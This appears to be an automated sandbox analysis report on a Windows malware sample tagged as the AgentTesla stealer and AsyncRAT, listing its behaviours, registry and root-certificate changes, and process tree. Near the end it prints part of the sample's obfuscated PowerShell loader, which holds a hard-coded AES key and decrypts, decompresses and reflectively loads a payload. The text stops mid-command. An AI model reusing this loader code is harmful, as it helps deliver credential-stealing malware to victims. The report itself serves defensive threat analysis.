Malware Analysis Report

2024-09-22 07:45

Sample ID 240604-p7h11sge51
Target b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318
SHA256 b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318
Tags
agenttesla execution keylogger spyware stealer trojan asyncrat default evasion rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318

Threat Level: Known bad

The file b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318 was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger spyware stealer trojan asyncrat default evasion rat

Modifies security service

Modifies firewall policy service

AgentTesla

AsyncRat

AgentTesla payload

Async RAT payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Modifies system certificate store

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-04 12:58

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-04 12:58

Reported

2024-06-04 13:00

Platform

win7-20240221-en

Max time kernel

122s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{1FA1FAA1-2272-11EF-B804-569FD5A164C1} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000017fe75b94b7814a98b6eff35b9c58bb00000000020000000000106600000001000020000000e960a04f42f0f6d1fca15e703955d9dfc16026ba94aeecbb60e810af92c1e5a1000000000e8000000002000020000000897c60fcee25c528047236312673393065b6bdd2ed5fba9bc35e4e794e7de37790000000c6bdb75a20cd560faaf2eb12cfc3eeae2edd2add0e5cf458f5771451112325f76e352ebed4b1e7e760b867873347cc8aa6300b9afab73b216dd422adfac4e45158ab475cdd624af6bbe3ad4a2ac91f4bb249cc85bcfe883047d2a4da3dd6b21584734144fb1583dd27cb97867c69cce78b8420faf8d793506aaea45bff01287b07d841a9a703471c4e75936b101bc5b54000000098b7a7b3d8be4bbedaffd765cf009843c3afac5f773183c501b661fafe159a4e8b1c4d37b640238412f7d3027b06e3d1b37c6d96c2a01b63cdea9b8d83c0e36a C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423667770" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000017fe75b94b7814a98b6eff35b9c58bb00000000020000000000106600000001000020000000216da5fa9d55c2d2dd40903cb4fe719f622e73a75d828f3299a8233ee76a8a02000000000e8000000002000020000000d16bd029a8c3065afe25fa5ebda99a5112bff16538ac196944f52727b891dbe6200000007f1aa5379a7a25d4f99e7ccc157c6af8417398c00a87a47551f0f9ba63300ca7400000007e1902e8d1b918ff1541b1a6062b86ae7eb931e5535faedc1449a7ac33f5a69dcc38cd5d8feb27e5c8c568e7d0287b91b9491d20ab5c1ce5d3682ef186235b0e C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40fddef47eb6da01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Windows\system32\cmd.exe
PID 2348 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
PID 2348 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
PID 2348 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
PID 2632 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2632 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2632 wrote to memory of 2724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2632 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2632 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2588 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2588 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2588 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2752 wrote to memory of 1204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2752 wrote to memory of 1204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2752 wrote to memory of 1204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2752 wrote to memory of 1204 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe

"C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DeathAuthentication.bat" "

C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe

"C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kGHinQ79UkF9r+tuo/CjrBrZV+MXdja5YdUtk0ihi64='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('303KSumhAOwl+H8eZdZWMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QnNmF=New-Object System.IO.MemoryStream(,$param_var); $zyqXV=New-Object System.IO.MemoryStream; $DhAXC=New-Object System.IO.Compression.GZipStream($QnNmF, [IO.Compression.CompressionMode]::Decompress); $DhAXC.CopyTo($zyqXV); $DhAXC.Dispose(); $QnNmF.Dispose(); $zyqXV.Dispose(); $zyqXV.ToArray();}function execute_function($param_var,$param2_var){ $qvAaV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); 